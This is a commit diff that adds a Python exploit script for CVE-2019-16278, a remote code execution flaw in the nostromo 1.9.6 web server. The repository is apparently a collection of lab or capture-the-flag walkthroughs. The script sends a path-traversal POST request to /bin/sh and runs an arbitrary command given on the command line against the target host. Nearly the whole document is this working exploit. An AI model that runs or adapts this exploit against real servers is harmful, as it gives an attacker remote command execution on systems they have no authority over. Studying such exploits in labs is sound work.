initial commit

Walkthroughs/OWASP2021/vuln-and-outdated/47837

@@ -0,0 +1,70 @@
+# Exploit Title: nostromo 1.9.6 - Remote Code Execution
+# Date: 2019-12-31
+# Exploit Author: Kr0ff
+# Vendor Homepage:
+# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+# Version: 1.9.6
+# Tested on: Debian
+# CVE : CVE-2019-16278
+
+#cve2019_16278.py
+
+#!/usr/bin/env python
+
+import sys
+import socket
+
+art = """
+
+                                        _____-2019-16278
+        _____  _______    ______   _____\    \   
+   _____\    \_\      |  |      | /    / |    |  
+  /     /|     ||     /  /     /|/    /  /___/|  
+ /     / /____/||\    \  \    |/|    |__ |___|/  
+|     | |____|/ \ \    \ |    | |       \        
+|     |  _____   \|     \|    | |     __/ __     
+|\     \|\    \   |\         /| |\    \  /  \    
+| \_____\|    |   | \_______/ | | \____\/    |   
+| |     /____/|    \ |     | /  | |    |____/|   
+ \|_____|    ||     \|_____|/    \|____|   | |   
+        |____|/                        |___|/    
+
+
+
+"""
+
+help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
+
+def connect(soc):
+    response = ""
+    try:
+        while True:
+            connection = soc.recv(1024)
+            if len(connection) == 0:
+                break
+            response += connection
+    except:
+        pass
+    return response
+
+def cve(target, port, cmd):
+    soc = socket.socket()
+    soc.connect((target, int(port)))
+    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
+    soc.send(payload)
+    receive = connect(soc)
+    print(receive)
+
+if __name__ == "__main__":
+
+    print(art)
+    
+    try:
+        target = sys.argv[1]
+        port = sys.argv[2]
+        cmd = sys.argv[3]
+
+        cve(target, port, cmd)
+   
+    except IndexError:
+        print(help_menu)